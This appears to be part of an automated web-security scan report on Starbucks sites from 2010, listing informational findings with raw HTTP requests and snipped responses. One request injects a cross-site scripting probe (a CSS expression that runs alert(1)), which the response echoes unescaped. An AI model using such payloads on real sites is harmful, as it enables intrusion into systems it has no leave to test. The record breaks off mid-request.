<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

9.5. http://www.starbucks.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?keywords=%27 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:14:11 GMT
Content-Length: 33615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

9.6. http://www.starbucks.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?keywords=%2797134"style%3d"x%3aexpression(alert(1))"eb377b674b2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.starbucks.com
Cookie: ASP.NET_SessionId=new0hf55b2avrbbgt3d0fz45; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:22:55 GMT
Content-Length: 33897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</span>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2" class="addthis_button_compact" title="Post to AddThis"><img src="/static/images/share-icon-addthis.gif" alt="Share on AddThis" />
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Coffee+%26+Espresso+Drinks">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Food">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Atmosphere+%26+Locations">My Starbucks Idea</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Sales</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Starbucks+Card">My Starbucks Idea</a>
...[SNIP]...
<li id="nav_shop"><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTB&amp;Redir=">Shop<br />
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fcoffee%2F">Coffee</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8750">Latin America Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8751">Africa/Arabia Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D8752">Asia/Pacific Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0153">Multi-Region Blends</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D8100%26SubClassNo%3D0171">Specialty Roasts</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Fvia%2F">Instant Coffees</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHCO&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Ftazo%2Dtea%2F">Tazo.. Tea</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0174">Black Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0176">Green Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0973">White Teas</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0027%26SubClassNo%3D0178">Herbal Infusions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2FStarbucksAtHome%2F">Subscriptions</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTZ&amp;Redir=%2Foffice%2F">For Business</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fequipment%2Easp">Brewing Equipment</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0966">Coffee Presses</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0266">Coffeemakers</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0950">Espresso Machines</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHEQ&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0036%26SubClassNo%3D0970">Grinders</a>
...[SNIP]...
<dd><a href="https://www.starbuckscardb2b.com/">Corporate Buying</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&amp;Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE">Drinkware</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHGF&amp;Redir=%2FGiftIdeas%2F">Gift Packs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHMU&amp;Redir=%2Fentertainment%2F">Music CDs</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/aff/adredir.asp?CCAID=SBPTPAHP1SHABT&amp;Redir=%2Fproducts%2Fshabotus%2Easp">About Starbucks Store</a>
...[SNIP]...
<dd><a href="http://mystarbucksidea.force.com/ideaList?ext=0&amp;lsi=0&amp;category=Merchandise+%26+Music">My Starbucks Idea</a>
...[SNIP]...
<dt><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA">Enjoy Our Espresso at Home</a>
...[SNIP]...
<dd><a href="http://www.starbucksstore.com/coffee-machines/?CCAID=SBPTPAHPODEA"><img src="http://assets.starbucks.com/assets/095c195acda948c4bee84fd51eb448a5.jpg" alt="Enjoy espresso at home" />
...[SNIP]...
<li><a href="https://www.starbuckscardb2b.com/">Starbucks Card Corporate Sales</a>
...[SNIP]...
<li><a href="http://www.twitter.com/starbucks/">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/starbucks/">Facebook</a>
...[SNIP]...
<li><a href="http://www.youtube.com/starbucks">YouTube</a>
...[SNIP]...
<li><a href="http://mystarbucksidea.force.com/">My Starbucks Idea</a>
...[SNIP]...
<li><a href="http://www.v2v.net/starbucks">Starbucks V2V</a>
...[SNIP]...
<li><a href="http://www.starbucks.at/">Austria/&#214;sterreich</a>
...[SNIP]...
<li><a href="http://www.starbucks.bg/">Bulgaria</a>
...[SNIP]...
<li><a href="http://www.starbucks.ca/">Canada</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.cz/">Czech Republic</a>
...[SNIP]...
<li><a href="http://www.starbucks.fr/">France</a>
...[SNIP]...
<li><a href="http://www.starbucksgermany.com/">Germany/Deutschland</a>
...[SNIP]...
<li><a href="http://www.starbucks.hu/">Hungary</a>
...[SNIP]...
<li><a href="http://www.starbucks.pl/">Poland</a>
...[SNIP]...
<li><a href="http://www.starbucks.pt/">Portugal</a>
...[SNIP]...
<li><a href="http://www.starbucksromania.ro/">Romania</a>
...[SNIP]...
<li><a href="http://www.starbuckscoffee.ru/">Russia</a>
...[SNIP]...
<li><a href="http://www.istarbucks.co.kr/">South Korea</a>
...[SNIP]...
<li><a href="http://www.starbucks.es/">Spain/Espa&ntilde;a</a>
...[SNIP]...
<li><a href="http://www.starbucks.ch/">Switzerland/Schweiz</a>
...[SNIP]...

9.7. http://www.starbucksstore.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/coffee/via/flavored-coffee
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCREF=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee&CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21201
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:18:41 GMT

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="http://fls.vulnerable.ad.partner/activityi;src=2206715;type=starb758;cat=starb781;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.8. http://www.starbucksstore.com/coffee-machines/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21102
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:05 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>
...[SNIP]...
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a>
...[SNIP]...
<!-- START SCANALERT CODE -->
       <a target="_blank" href="https://www.scanalert.com/RatingVerify?ref=www.starbucksstore.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.starbucksstore.com/13.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
<br />
               <a href="http://www.starbucks.com/retail/locator/default.aspx">Store Locator</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-9bm3B9rxXwY6c.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

9.9. http://www.starbucksstore.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /default.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /default.asp?CCAID=SBPTPAHP1SHTB&Redir= HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
